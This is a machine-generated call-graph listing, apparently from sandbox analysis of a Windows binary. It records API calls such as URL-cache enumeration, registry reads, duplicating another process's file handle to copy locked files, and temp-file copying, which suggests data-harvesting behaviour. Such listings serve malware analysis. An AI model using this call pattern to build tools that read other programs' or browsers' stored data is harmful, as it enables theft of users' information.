38667->38668 38668->38666 38669->38350 38670->38669 38671->38219 38672->38307 38673->38291 38674->38291 38675->38322 38677 409c89 38676->38677 38677->38346 38678->38375 38680 413d39 38679->38680 38681 413d2f FreeLibrary 38679->38681 38682 40b633 ??3@YAXPAX 38680->38682 38681->38680 38683 413d42 38682->38683 38684 40b633 ??3@YAXPAX 38683->38684 38685 413d4a 38684->38685 38685->38338 38686->38204 38687->38205 38688->38276 38690 44db70 38689->38690 38691 40b6fc memset 38690->38691 38692 409c70 2 API calls 38691->38692 38693 40b732 wcsrchr 38692->38693 38694 40b743 38693->38694 38695 40b746 memset 38693->38695 38694->38695 38696 40b2cc 27 API calls 38695->38696 38697 40b76f 38696->38697 38698 409d1f 6 API calls 38697->38698 38699 40b783 38698->38699 39518 409b98 GetFileAttributesW 38699->39518 38701 40b792 38702 409c70 2 API calls 38701->38702 38716 40b7c2 38701->38716 38704 40b7a5 38702->38704 38706 40b2cc 27 API calls 38704->38706 38711 40b7b2 38706->38711 38707 40b837 FindCloseChangeNotification 38710 40b83e memset 38707->38710 38708 40b817 39553 409a45 GetTempPathW 38708->39553 39552 40a6e6 WideCharToMultiByte 38710->39552 38714 409d1f 6 API calls 38711->38714 38712 40b827 CopyFileW 38712->38710 38714->38716 38715 40b866 38717 444432 121 API calls 38715->38717 39519 40bb98 38716->39519 38718 40b879 38717->38718 38719 40bad5 38718->38719 38720 40b273 27 API calls 38718->38720 38721 40baeb 38719->38721 38722 40bade DeleteFileW 38719->38722 38723 40b89a 38720->38723 38724 40b04b ??3@YAXPAX 38721->38724 38722->38721 38725 438552 134 API calls 38723->38725 38726 40baf3 38724->38726 38727 40b8a4 38725->38727 38726->38207 38728 40bacd 38727->38728 38730 4251c4 137 API calls 38727->38730 38729 443d90 111 API calls 38728->38729 38729->38719 38753 40b8b8 38730->38753 38731 40bac6 39565 424f26 123 API calls 38731->39565 38732 40b8bd memset 39556 425413 17 API calls 38732->39556 38735 425413 17 API calls 38735->38753 38738 40a71b MultiByteToWideChar 38738->38753 38739 40a734 MultiByteToWideChar 38739->38753 38742 40b9b5 memcmp 38742->38753 38743 4099c6 2 API calls 38743->38753 38744 404423 37 API calls 38744->38753 38747 4251c4 137 API calls 38747->38753 38748 40bb3e memset memcpy 39566 40a734 MultiByteToWideChar 38748->39566 38750 40bb88 LocalFree 38750->38753 38753->38731 38753->38732 38753->38735 38753->38738 38753->38739 38753->38742 38753->38743 38753->38744 38753->38747 38753->38748 38754 40ba5f memcmp 38753->38754 39557 4253ef 16 API calls 38753->39557 39558 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38753->39558 39559 4253af 17 API calls 38753->39559 39560 4253cf 17 API calls 38753->39560 39561 447280 memset 38753->39561 39562 447960 memset memcpy memcpy memcpy 38753->39562 39563 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38753->39563 39564 447920 memcpy memcpy memcpy 38753->39564 38754->38753 38755->38280 38757 40aed1 38756->38757 38758 40aec7 FindClose 38756->38758 38757->38216 38758->38757 38760 4099d7 38759->38760 38761 4099da memcpy 38759->38761 38760->38761 38761->38263 38763 40b2cc 27 API calls 38762->38763 38764 44543f 38763->38764 38765 409d1f 6 API calls 38764->38765 38766 44544f 38765->38766 39653 409b98 GetFileAttributesW 38766->39653 38768 445476 38771 40b2cc 27 API calls 38768->38771 38769 44545e 38769->38768 38770 40b6ef 252 API calls 38769->38770 38770->38768 38772 445482 38771->38772 38773 409d1f 6 API calls 38772->38773 38774 445492 38773->38774 39654 409b98 GetFileAttributesW 38774->39654 38776 4454a1 38777 4454b9 38776->38777 38778 40b6ef 252 API calls 38776->38778 38777->38289 38778->38777 38779->38288 38780->38312 38781->38318 38782->38353 38783->38334 38784->38378 38785->38378 38786->38364 38787->38394 38788->38396 38789->38398 38791 414c2e 16 API calls 38790->38791 38792 40c2ae 38791->38792 38862 40c1d3 38792->38862 38797 40c3be 38814 40a8ab 38797->38814 38798 40afcf 2 API calls 38799 40c2fd FindFirstUrlCacheEntryW 38798->38799 38800 40c3b6 38799->38800 38801 40c31e wcschr 38799->38801 38802 40b04b ??3@YAXPAX 38800->38802 38803 40c331 38801->38803 38804 40c35e FindNextUrlCacheEntryW 38801->38804 38802->38797 38805 40a8ab 9 API calls 38803->38805 38804->38801 38806 40c373 GetLastError 38804->38806 38809 40c33e wcschr 38805->38809 38807 40c3ad FindCloseUrlCache 38806->38807 38808 40c37e 38806->38808 38807->38800 38810 40afcf 2 API calls 38808->38810 38809->38804 38811 40c34f 38809->38811 38812 40c391 FindNextUrlCacheEntryW 38810->38812 38813 40a8ab 9 API calls 38811->38813 38812->38801 38812->38807 38813->38804 38956 40a97a 38814->38956 38817 40a8cc 38817->38405 38818 40a8d0 7 API calls 38818->38817 38961 40b1ab ??3@YAXPAX ??3@YAXPAX 38819->38961 38821 40c3dd 38822 40b2cc 27 API calls 38821->38822 38823 40c3e7 38822->38823 38962 414592 RegOpenKeyExW 38823->38962 38825 40c3f4 38826 40c50e 38825->38826 38827 40c3ff 38825->38827 38841 405337 38826->38841 38828 40a9ce 4 API calls 38827->38828 38829 40c418 memset 38828->38829 38963 40aa1d 38829->38963 38832 40c471 38834 40c47a _wcsupr 38832->38834 38833 40c505 RegCloseKey 38833->38826 38835 40a8d0 7 API calls 38834->38835 38836 40c498 38835->38836 38837 40a8d0 7 API calls 38836->38837 38838 40c4ac memset 38837->38838 38839 40aa1d 38838->38839 38840 40c4e4 RegEnumValueW 38839->38840 38840->38833 38840->38834 38965 405220 38841->38965 38845 4099c6 2 API calls 38844->38845 38846 40a714 _wcslwr 38845->38846 38847 40c634 38846->38847 39022 405361 38847->39022 38850 40c65c wcslen 39025 4053b6 39 API calls 38850->39025 38851 40c71d wcslen 38851->38419 38853 40c677 38854 40c713 38853->38854 39026 40538b 39 API calls 38853->39026 39028 4053df 39 API calls 38854->39028 38857 40c6a5 38857->38854 38858 40c6a9 memset 38857->38858 38859 40c6d3 38858->38859 39027 40c589 43 API calls 38859->39027 38861->38412 38863 40ae18 9 API calls 38862->38863 38869 40c210 38863->38869 38864 40ae51 9 API calls 38864->38869 38865 40c264 38866 40aebe FindClose 38865->38866 38868 40c26f 38866->38868 38867 40add4 2 API calls 38867->38869 38874 40e5ed memset memset 38868->38874 38869->38864 38869->38865 38869->38867 38870 40c231 _wcsicmp 38869->38870 38871 40c1d3 35 API calls 38869->38871 38870->38869 38872 40c248 38870->38872 38871->38869 38887 40c084 22 API calls 38872->38887 38875 414c2e 16 API calls 38874->38875 38876 40e63f 38875->38876 38877 409d1f 6 API calls 38876->38877 38878 40e658 38877->38878 38888 409b98 GetFileAttributesW 38878->38888 38880 40e667 38881 40e680 38880->38881 38882 409d1f 6 API calls 38880->38882 38889 409b98 GetFileAttributesW 38881->38889 38882->38881 38884 40e68f 38886 40c2d8 38884->38886 38890 40e4b2 38884->38890 38886->38797 38886->38798 38887->38869 38888->38880 38889->38884 38911 40e01e 38890->38911 38892 40e593 38893 40e5b0 38892->38893 38894 40e59c DeleteFileW 38892->38894 38896 40b04b ??3@YAXPAX 38893->38896 38894->38893 38895 40e521 38895->38892 38934 40e175 38895->38934 38897 40e5bb 38896->38897 38899 40e5c4 CloseHandle 38897->38899 38900 40e5cc 38897->38900 38899->38900 38902 40b633 ??3@YAXPAX 38900->38902 38901 40e573 38904 40e584 38901->38904 38905 40e57c FindCloseChangeNotification 38901->38905 38903 40e5db 38902->38903 38907 40b633 ??3@YAXPAX 38903->38907 38955 40b1ab ??3@YAXPAX ??3@YAXPAX 38904->38955 38905->38904 38906 40e540 38906->38901 38954 40e2ab 30 API calls 38906->38954 38909 40e5e3 38907->38909 38909->38886 38912 406214 22 API calls 38911->38912 38913 40e03c 38912->38913 38914 40e16b 38913->38914 38915 40dd85 74 API calls 38913->38915 38914->38895 38916 40e06b 38915->38916 38916->38914 38917 40afcf ??2@YAPAXI ??3@YAXPAX 38916->38917 38918 40e08d OpenProcess 38917->38918 38919 40e0a4 GetCurrentProcess DuplicateHandle 38918->38919 38923 40e152 38918->38923 38920 40e0d0 GetFileSize 38919->38920 38921 40e14a CloseHandle 38919->38921 38924 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38920->38924 38921->38923 38922 40e160 38926 40b04b ??3@YAXPAX 38922->38926 38923->38922 38925 406214 22 API calls 38923->38925 38927 40e0ea 38924->38927 38925->38922 38926->38914 38928 4096dc CreateFileW 38927->38928 38929 40e0f1 CreateFileMappingW 38928->38929 38930 40e140 CloseHandle CloseHandle 38929->38930 38931 40e10b MapViewOfFile 38929->38931 38930->38921 38932 40e13b FindCloseChangeNotification 38931->38932 38933 40e11f WriteFile UnmapViewOfFile 38931->38933 38932->38930 38933->38932 38935 40e18c 38934->38935 38936 406b90 11 API calls 38935->38936 38937 40e19f 38936->38937 38938 40e1a7 memset 38937->38938 38939 40e299 38937->38939 38944 40e1e8 38938->38944 38940 4069a3 ??3@YAXPAX ??3@YAXPAX 38939->38940 38941 40e2a4 38940->38941 38941->38906 38942 406e8f 13 API calls 38942->38944 38943 406b53 SetFilePointerEx ReadFile 38943->38944 38944->38942 38944->38943 38945 40e283 38944->38945 38946 40dd50 _wcsicmp 38944->38946 38950 40742e 8 API calls 38944->38950 38951 40aae3 wcslen wcslen _memicmp 38944->38951 38952 40e244 _snwprintf 38944->38952 38947 40e291 38945->38947 38948 40e288 ??3@YAXPAX 38945->38948 38946->38944 38949 40aa04 ??3@YAXPAX 38947->38949 38948->38947 38949->38939 38950->38944 38951->38944 38953 40a8d0 7 API calls 38952->38953 38953->38944 38954->38906 38955->38892 38958 40a980 38956->38958 38957 40a8bb 38957->38817 38957->38818 38958->38957 38959 40a995 _wcsicmp 38958->38959 38960 40a99c wcscmp 38958->38960 38959->38958 38960->38958 38961->38821 38962->38825 38964 40aa23 RegEnumValueW 38963->38964 38964->38832 38964->38833 38966 405335 38965->38966 38967 40522a 38965->38967 38966->38419 38968 40b2cc 27 API calls 38967->38968 38969 405234 38968->38969 38970 40a804 8 API calls 38969->38970 38971 40523a 38970->38971 39010 40b273 38971->39010 38973 405248 _mbscpy _mbscat GetProcAddress 38974 40b273 27 API calls 38973->38974 38975 405279 38974->38975 39013 405211 GetProcAddress 38975->39013 38977 405282 38978 40b273 27 API calls 38977->38978 38979 40528f 38978->38979 39014 405211 GetProcAddress 38979->39014 38981 405298 38982 40b273 27 API calls 38981->38982 38983 4052a5 38982->38983 39015 405211 GetProcAddress 38983->39015 38985 4052ae 38986 40b273 27 API calls 38985->38986 38987 4052bb 38986->38987 39016 405211 GetProcAddress 38987->39016 38989 4052c4 38990 40b273 27 API calls 38989->38990 38991 4052d1 38990->38991 39017 405211 GetProcAddress 38991->39017 38993 4052da 38994 40b273 27 API calls 38993->38994 38995 4052e7 38994->38995 39018 405211 GetProcAddress 38995->39018 38997 4052f0 38998 40b273 27 API calls 38997->38998 38999 4052fd 38998->38999 39019 405211 GetProcAddress 38999->39019 39001 405306 39002 40b273 27 API calls 39001->39002 39003 405313 39002->39003 39020 405211 GetProcAddress 39003->39020 39005 40531c 39006 40b273 27 API calls 39005->39006 39007 405329 39006->39007 39021 405211 GetProcAddress 39007->39021 39009 405332 39009->38966 39011 40b58d 27 API calls 39010->39011 39012 40b18c 39011->39012 39012->38973 39013->38977 39014->38981 39015->38985 39016->38989 39017->38993 39018->38997 39019->39001 39020->39005 39021->39009 39023 405220 39 API calls 39022->39023 39024 405369 39023->39024 39024->38850 39024->38851 39025->38853 39026->38857 39027->38854 39028->38851 39030 40440c FreeLibrary 39029->39030 39031 40436d 39030->39031 39032 40a804 8 API calls 39031->39032 39033 404377 39032->39033 39034 404383 39033->39034 39035 404405 39033->39035 39036 40b273 27 API calls 39034->39036 39035->38424 39035->38426 39035->38427 39037 40438d GetProcAddress 39036->39037 39038 40b273 27 API calls 39037->39038 39039 4043a7 GetProcAddress 39038->39039 39040 40b273 27 API calls 39039->39040 39041 4043ba GetProcAddress 39040->39041 39042 40b273 27 API calls 39041->39042 39043 4043ce GetProcAddress 39042->39043 39044 40b273 27 API calls 39043->39044 39045 4043e2 GetProcAddress 39044->39045 39046 4043f1 39045->39046 39047 4043f7 39046->39047 39048 40440c FreeLibrary 39046->39048 39047->39035 39048->39035 39050 404413 FreeLibrary 39049->39050 39051 40441e 39049->39051 39050->39051 39051->38441 39052->38437 39054 40442e 39053->39054 39056 40447e 39053->39056 39055 40b2cc 27 API calls 39054->39055 39057 404438 39055->39057 39056->38437 39058 40a804 8 API calls 39057->39058 39059 40443e 39058->39059 39060 404445 39059->39060 39061 404467 39059->39061 39062 40b273 27 API calls 39060->39062 39061->39056 39064 404475 FreeLibrary 39061->39064 39063 40444f GetProcAddress 39062->39063 39063->39061 39065 404460 39063->39065 39064->39056 39065->39061 39067 4135f6 39066->39067 39068 4135eb FreeLibrary 39066->39068 39067->38444 39068->39067 39070 4449c4 39069->39070 39071 444a52 39069->39071 39072 40b2cc 27 API calls 39070->39072 39071->38461 39071->38466 39073 4449cb 39072->39073 39074 40a804 8 API calls 39073->39074 39075 4449d1 39074->39075 39076 40b273 27 API calls 39075->39076 39077 4449dc GetProcAddress 39076->39077 39078 40b273 27 API calls 39077->39078 39079 4449f3 GetProcAddress 39078->39079 39080 40b273 27 API calls 39079->39080 39081 444a04 GetProcAddress 39080->39081 39082 40b273 27 API calls 39081->39082 39083 444a15 GetProcAddress 39082->39083 39084 40b273 27 API calls 39083->39084 39085 444a26 GetProcAddress 39084->39085 39086 40b273 27 API calls 39085->39086 39087 444a37 GetProcAddress 39086->39087 39088 40b273 27 API calls 39087->39088 39089 444a48 GetProcAddress 39088->39089 39089->39071 39090->38472 39091->38472 39092->38472 39093->38472 39094->38462 39096 403a29 39095->39096 39110 403bed memset memset 39096->39110 39098 403ae7 39123 40b1ab ??3@YAXPAX ??3@YAXPAX 39098->39123 39099 403a3f memset 39104 403a2f 39099->39104 39101 403aef 39101->38481 39102 409d1f 6 API calls 39102->39104 39103 409b98 GetFileAttributesW 39103->39104 39104->39098 39104->39099 39104->39102 39104->39103 39105 40a8d0 7 API calls 39104->39105 39105->39104 39107 40a051 GetFileTime FindCloseChangeNotification 39106->39107 39108 4039ca CompareFileTime 39106->39108 39107->39108 39108->38481 39109->38478 39111 414c2e 16 API calls 39110->39111 39112 403c38 39111->39112 39113 409719 2 API calls 39112->39113 39114 403c3f wcscat 39113->39114 39115 414c2e 16 API calls 39114->39115 39116 403c61 39115->39116 39117 409719 2 API calls 39116->39117 39118 403c68 wcscat 39117->39118 39124 403af5 39118->39124 39121 403af5 20 API calls 39122 403c95 39121->39122 39122->39104 39123->39101 39125 403b02 39124->39125 39126 40ae18 9 API calls 39125->39126 39128 403b37 39126->39128 39127 40ae51 9 API calls 39127->39128 39128->39127 39129 403bdb 39128->39129 39130 40add4 wcscmp wcscmp 39128->39130 39133 40ae18 9 API calls 39128->39133 39134 40aebe FindClose 39128->39134 39135 40a8d0 7 API calls 39128->39135 39131 40aebe FindClose 39129->39131 39130->39128 39132 403be6 39131->39132 39132->39121 39133->39128 39134->39128 39135->39128 39137 409d1f 6 API calls 39136->39137 39138 404190 39137->39138 39151 409b98 GetFileAttributesW 39138->39151 39140 40419c 39141 4041a7 6 API calls 39140->39141 39142 40435c 39140->39142 39144 40424f 39141->39144 39142->38506 39144->39142 39145 40425e memset 39144->39145 39147 409d1f 6 API calls 39144->39147 39148 40a8ab 9 API calls 39144->39148 39152 414842 39144->39152 39145->39144 39146 404296 wcscpy 39145->39146 39146->39144 39147->39144 39149 4042b6 memset memset _snwprintf wcscpy 39148->39149 39149->39144 39150->38504 39151->39140 39155 41443e 39152->39155 39154 414866 39154->39144 39156 41444b 39155->39156 39157 414451 39156->39157 39158 4144a3 GetPrivateProfileStringW 39156->39158 39159 414491 39157->39159 39160 414455 wcschr 39157->39160 39158->39154 39162 414495 WritePrivateProfileStringW 39159->39162 39160->39159 39161 414463 _snwprintf 39160->39161 39161->39162 39162->39154 39163->38510 39165 40b2cc 27 API calls 39164->39165 39166 409615 39165->39166 39167 409d1f 6 API calls 39166->39167 39168 409625 39167->39168 39193 409b98 GetFileAttributesW 39168->39193 39170 409634 39171 409648 39170->39171 39194 4091b8 memset 39170->39194 39173 40b2cc 27 API calls 39171->39173 39175 408801 39171->39175 39174 40965d 39173->39174 39176 409d1f 6 API calls 39174->39176 39175->38513 39175->38546 39177 40966d 39176->39177 39246 409b98 GetFileAttributesW 39177->39246 39179 40967c 39179->39175 39180 409681 39179->39180 39247 409529 72 API calls 39180->39247 39182 409690 39182->39175 39183->38535 39184->38546 39185->38540 39186->38546 39187->38545 39193->39170 39248 40a6e6 WideCharToMultiByte 39194->39248 39196 409202 39249 444432 39196->39249 39199 40b273 27 API calls 39200 409236 39199->39200 39295 438552 39200->39295 39203 409383 39205 40b273 27 API calls 39203->39205 39207 409399 39205->39207 39206 409254 39208 40937b 39206->39208 39316 4253cf 17 API calls 39206->39316 39209 438552 134 API calls 39207->39209 39320 424f26 123 API calls 39208->39320 39227 4093a3 39209->39227 39212 409267 39317 4253cf 17 API calls 39212->39317 39213 4094ff 39324 443d90 39213->39324 39216 4251c4 137 API calls 39216->39227 39217 409273 39218 409507 39226 40951d 39218->39226 39344 408f2f 77 API calls 39218->39344 39220 4093df 39323 424f26 123 API calls 39220->39323 39224 4253cf 17 API calls 39224->39227 39226->39171 39227->39213 39227->39216 39227->39220 39227->39224 39229 4093e4 39227->39229 39321 4253af 17 API calls 39229->39321 39236 4093ed 39322 4253af 17 API calls 39236->39322 39239 4093f9 39239->39220 39240 409409 memcmp 39239->39240 39240->39220 39241 409421 memcmp 39240->39241 39242 4094a4 memcmp 39241->39242 39243 409435 39241->39243 39242->39220 39245 4094b8 memcpy memcpy 39242->39245 39243->39220 39244 409442 memcpy memcpy memcpy 39243->39244 39244->39220 39245->39220 39246->39179 39247->39182 39248->39196 39345 4438b5 39249->39345 39251 44444c 39252 409215 39251->39252 39359 415a6d 39251->39359 39252->39199 39252->39226 39254 4442e6 11 API calls 39255 44469e 39254->39255 39255->39252 39259 443d90 111 API calls 39255->39259 39256 444486 39257 4444b9 memcpy 39256->39257 39294 4444a4 39256->39294 39363 415258 39257->39363 39259->39252 39260 444524 39261 444541 39260->39261 39262 44452a 39260->39262 39366 444316 39261->39366 39263 416935 16 API calls 39262->39263 39263->39294 39266 444316 18 API calls 39267 444563 39266->39267 39268 444316 18 API calls 39267->39268 39269 44456f 39268->39269 39270 444316 18 API calls 39269->39270 39271 44457f 39270->39271 39271->39294 39380 432d4e 39271->39380 39274 444316 18 API calls 39275 4445b0 39274->39275 39294->39254 39433 438460 39295->39433 39297 409240 39297->39203 39298 4251c4 39297->39298 39445 424f07 39298->39445 39300 4251e4 39301 4251f7 39300->39301 39302 4251e8 39300->39302 39453 4250f8 39301->39453 39452 4446ea 11 API calls 39302->39452 39304 4251f2 39304->39206 39306 425209 39309 425249 39306->39309 39312 4250f8 127 API calls 39306->39312 39313 425287 39306->39313 39461 4384e9 135 API calls 39306->39461 39462 424f74 124 API calls 39306->39462 39309->39313 39463 424ff0 13 API calls 39309->39463 39312->39306 39465 415c7d 39313->39465 39314 425266 39314->39313 39316->39212 39317->39217 39320->39203 39321->39236 39322->39239 39323->39213 39325 443da3 39324->39325 39326 443db6 39324->39326 39469 41707a 11 API calls 39325->39469 39326->39218 39328 443da8 39329 443dbc 39328->39329 39330 443dac 39328->39330 39471 4300e8 memset memset memcpy 39329->39471 39470 4446ea 11 API calls 39330->39470 39334 443dce 39335 443de0 39334->39335 39339 443e22 39334->39339 39344->39226 39346 4438d0 39345->39346 39355 4438c9 39345->39355 39347 415378 memcpy memcpy 39346->39347 39348 4438d5 39347->39348 39349 4154e2 10 API calls 39348->39349 39350 443906 39348->39350 39348->39355 39349->39350 39351 443970 memset 39350->39351 39350->39355 39354 44398b 39351->39354 39352 4439a0 39353 415700 10 API calls 39352->39353 39352->39355 39357 4439c0 39353->39357 39354->39352 39356 41975c 10 API calls 39354->39356 39355->39251 39356->39352 39357->39355 39358 418981 10 API calls 39357->39358 39358->39355 39360 415a77 39359->39360 39361 415a8d 39360->39361 39362 415a7e memset 39360->39362 39361->39256 39362->39361 39364 4438b5 11 API calls 39363->39364 39365 41525d 39364->39365 39365->39260 39367 444328 39366->39367 39368 444423 39367->39368 39369 44434e 39367->39369 39370 4446ea 11 API calls 39368->39370 39371 432d4e memset memset memcpy 39369->39371 39378 444381 39370->39378 39372 44435a 39371->39372 39374 444375 39372->39374 39379 44438b 39372->39379 39373 432d4e memset memset memcpy 39375 4443ec 39373->39375 39376 416935 16 API calls 39374->39376 39377 416935 16 API calls 39375->39377 39375->39378 39376->39378 39377->39378 39378->39266 39379->39373 39381 432d58 39380->39381 39383 432d65 39380->39383 39382 432cc4 memset memset memcpy 39381->39382 39382->39383 39383->39274 39434 41703f 11 API calls 39433->39434 39435 43847a 39434->39435 39436 43848a 39435->39436 39437 43847e 39435->39437 39439 438270 134 API calls 39436->39439 39438 4446ea 11 API calls 39437->39438 39441 438488 39438->39441 39440 4384aa 39439->39440 39440->39441 39442 424f26 123 API calls 39440->39442 39441->39297 39443 4384bb 39442->39443 39444 438270 134 API calls 39443->39444 39444->39441 39446 424f1f 39445->39446 39447 424f0c 39445->39447 39449 424eea 11 API calls 39446->39449 39448 416760 11 API calls 39447->39448 39450 424f18 39448->39450 39451 424f24 39449->39451 39450->39300 39451->39300 39452->39304 39454 425108 39453->39454 39460 42510d 39453->39460 39455 424f74 124 API calls 39454->39455 39455->39460 39456 42569b 125 API calls 39457 42516e 39456->39457 39459 415c7d 16 API calls 39457->39459 39458 425115 39458->39306 39459->39458 39460->39456 39460->39458 39461->39306 39462->39306 39463->39314 39466 415c81 39465->39466 39467 415c9c 39465->39467 39466->39467 39467->39304 39469->39328 39470->39326 39471->39334 39502 413f4f 39475->39502 39478 413f37 K32GetModuleFileNameExW 39479 413f4a 39478->39479 39479->38573 39481 413969 wcscpy 39480->39481 39482 41396c wcschr 39480->39482 39486 413a3a 39481->39486 39482->39481 39484 41398e 39482->39484 39507 4097f7 wcslen wcslen _memicmp 39484->39507 39486->38573 39487 41399a 39488 4139a4 memset 39487->39488 39489 4139e6 39487->39489 39508 409dd5 GetWindowsDirectoryW wcscpy 39488->39508 39491 413a31 wcscpy 39489->39491 39492 4139ec memset 39489->39492 39491->39486 39509 409dd5 GetWindowsDirectoryW wcscpy 39492->39509 39493 4139c9 wcscpy wcscat 39493->39486 39495 413a11 memcpy wcscat 39495->39486 39497 413cb0 GetModuleHandleW 39496->39497 39498 413cda 39496->39498 39497->39498 39499 413cbf GetProcAddress 39497->39499 39500 413ce3 GetProcessTimes 39498->39500 39501 413cf6 39498->39501 39499->39498 39500->38575 39501->38575 39503 413f2f 39502->39503 39504 413f54 39502->39504 39503->39478 39503->39479 39505 40a804 8 API calls 39504->39505 39506 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39505->39506 39506->39503 39507->39487 39508->39493 39509->39495 39510->38595 39511->38618 39513 409cf9 GetVersionExW 39512->39513 39514 409d0a 39512->39514 39513->39514 39514->38625 39514->38628 39515->38631 39516->38634 39517->38636 39518->38701 39520 40bba5 39519->39520 39567 40cc26 39520->39567 39523 40bd4b 39588 40cc0c 39523->39588 39528 40b2cc 27 API calls 39529 40bbef 39528->39529 39595 40ccf0 _wcsicmp 39529->39595 39531 40bbf5 39531->39523 39596 40ccb4 6 API calls 39531->39596 39533 40bc26 39534 40cf04 17 API calls 39533->39534 39535 40bc2e 39534->39535 39536 40bd43 39535->39536 39537 40b2cc 27 API calls 39535->39537 39538 40cc0c 4 API calls 39536->39538 39539 40bc40 39537->39539 39538->39523 39597 40ccf0 _wcsicmp 39539->39597 39541 40bc46 39541->39536 39542 40bc61 memset memset WideCharToMultiByte 39541->39542 39598 40103c strlen 39542->39598 39544 40bcc0 39545 40b273 27 API calls 39544->39545 39546 40bcd0 memcmp 39545->39546 39546->39536 39547 40bce2 39546->39547 39548 404423 37 API calls 39547->39548 39549 40bd10 39548->39549 39549->39536 39550 40bd3a LocalFree 39549->39550 39551 40bd1f memcpy 39549->39551 39550->39536 39551->39550 39552->38715 39554 409a74 GetTempFileNameW 39553->39554 39555 409a66 GetWindowsDirectoryW 39553->39555 39554->38712 39555->39554 39556->38753 39557->38753 39558->38753 39559->38753 39560->38753 39561->38753 39562->38753 39563->38753 39564->38753 39565->38728 39566->38750 39599 4096c3 CreateFileW 39567->39599 39569 40cc34 39570 40cc3d GetFileSize 39569->39570 39571 40bbca 39569->39571 39572 40afcf 2 API calls 39570->39572 39571->39523 39579 40cf04 39571->39579 39573 40cc64 39572->39573 39600 40a2ef ReadFile 39573->39600 39575 40cc71 39601 40ab4a MultiByteToWideChar 39575->39601 39577 40cc95 FindCloseChangeNotification 39578 40b04b ??3@YAXPAX 39577->39578 39578->39571 39580 40b633 ??3@YAXPAX 39579->39580 39581 40cf14 39580->39581 39607 40b1ab ??3@YAXPAX ??3@YAXPAX 39581->39607 39583 40bbdd 39583->39523 39583->39528 39584 40cf1b 39584->39583 39586 40cfef 39584->39586 39608 40cd4b 39584->39608 39587 40cd4b 14 API calls 39586->39587 39587->39583 39589 40b633 ??3@YAXPAX 39588->39589 39590 40cc15 39589->39590 39591 40aa04 ??3@YAXPAX 39590->39591 39592 40cc1d 39591->39592 39652 40b1ab ??3@YAXPAX ??3@YAXPAX 39592->39652 39594 40b7d4 memset CreateFileW 39594->38707 39594->38708 39595->39531 39596->39533 39597->39541 39598->39544 39599->39569 39600->39575 39602 40ab6b 39601->39602 39606 40ab93 39601->39606 39603 40a9ce 4 API calls 39602->39603 39604 40ab74 39603->39604 39605 40ab7c MultiByteToWideChar 39604->39605 39605->39606 39606->39577 39607->39584 39609 40cd7b 39608->39609 39642 40aa29 6 API calls 39609->39642 39611 40cef5 39612 40aa04 ??3@YAXPAX 39611->39612 39613 40cefd 39612->39613 39613->39584 39614 40cd89 39614->39611 39643 40aa29 6 API calls 39614->39643 39616 40ce1d 39644 40aa29 6 API calls 39616->39644 39618 40ce3e 39619 40ce6a 39618->39619 39645 40abb7 wcslen memmove 39618->39645 39620 40ce9f 39619->39620 39648 40abb7 wcslen memmove 39619->39648 39622 40a8d0 7 API calls 39620->39622 39626 40ceb5 39622->39626 39623 40ce56 39646 40aa71 wcslen 39623->39646 39625 40ce8b 39649 40aa71 wcslen 39625->39649 39632 40a8d0 7 API calls 39626->39632 39629 40ce5e 39647 40abb7 wcslen memmove 39629->39647 39630 40ce93 39650 40abb7 wcslen memmove 39630->39650 39634 40cecb 39632->39634 39651 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39634->39651 39636 40cedd 39637 40aa04 ??3@YAXPAX 39636->39637 39638 40cee5 39637->39638 39639 40aa04 ??3@YAXPAX 39638->39639 39640 40ceed 39639->39640 39641 40aa04 ??3@YAXPAX 39640->39641 39641->39611 39642->39614 39643->39616 39644->39618 39645->39623 39646->39629 39647->39619 39648->39625 39649->39630 39650->39620 39651->39636 39652->39594 39653->38769 39654->38776 37537 44dea5 37538 44deb5 FreeLibrary 37537->37538 37539 44dec3 37537->37539 37538->37539 39664 4148b6 FindResourceW 39665 4148f9 39664->39665 39666 4148cf SizeofResource 39664->39666 39666->39665 39667 4148e0 LoadResource 39666->39667 39667->39665 39668 4148ee LockResource 39667->39668 39668->39665 37716 415304 ??3@YAXPAX 39669 441b3f 39679 43a9f6 39669->39679 39671 441b61 39852 4386af memset 39671->39852 39673 44189a 39674 442bd4 39673->39674 39675 4418e2 39673->39675 39676 4418ea 39674->39676 39854 441409 memset 39674->39854 39675->39676 39853 4414a9 12 API calls 39675->39853 39680 43aa20 39679->39680 39681 43aadf 39679->39681 39680->39681 39682 43aa34 memset 39680->39682 39681->39671 39683 43aa56 39682->39683 39684 43aa4d 39682->39684 39855 43a6e7 39683->39855 39863 42c02e memset 39684->39863 39689 43aad3 39865 4169a7 11 API calls 39689->39865 39690 43aaae 39690->39681 39690->39689 39705 43aae5 39690->39705 39691 43ac18 39694 43ac47 39691->39694 39867 42bbd5 memcpy memcpy memcpy memset memcpy 39691->39867 39695 43aca8 39694->39695 39868 438eed 16 API calls 39694->39868 39699 43acd5 39695->39699 39870 4233ae 11 API calls 39695->39870 39698 43ac87 39869 4233c5 16 API calls 39698->39869 39871 423426 11 API calls 39699->39871 39703 43ace1 39872 439811 163 API calls 39703->39872 39704 43a9f6 161 API calls 39704->39705 39705->39681 39705->39691 39705->39704 39866 439bbb 22 API calls 39705->39866 39707 43acfd 39712 43ad2c 39707->39712 39873 438eed 16 API calls 39707->39873 39709 43ad19 39874 4233c5 16 API calls 39709->39874 39711 43ad58 39875 44081d 163 API calls 39711->39875 39712->39711 39715 43add9 39712->39715 39879 423426 11 API calls 39715->39879 39716 43ae3a memset 39717 43ae73 39716->39717 39880 42e1c0 147 API calls 39717->39880 39718 43adab 39877 438c4e 163 API calls 39718->39877 39719 43ad6c 39719->39681 39719->39718 39876 42370b memset memcpy memset 39719->39876 39723 43adcc 39878 440f84 12 API calls 39723->39878 39724 43ae96 39881 42e1c0 147 API calls 39724->39881 39727 43aea8 39728 43aec1 39727->39728 39882 42e199 147 API calls 39727->39882 39730 43af00 39728->39730 39883 42e1c0 147 API calls 39728->39883 39730->39681 39733 43af1a 39730->39733 39734 43b3d9 39730->39734 39884 438eed 16 API calls 39733->39884 39739 43b3f6 39734->39739 39743 43b4c8 39734->39743 39735 43b60f 39735->39681 39943 4393a5 17 API calls 39735->39943 39738 43af2f 39885 4233c5 16 API calls 39738->39885 39925 432878 12 API calls 39739->39925 39741 43af51 39886 423426 11 API calls 39741->39886 39752 43b4f2 39743->39752 39931 42bbd5 memcpy 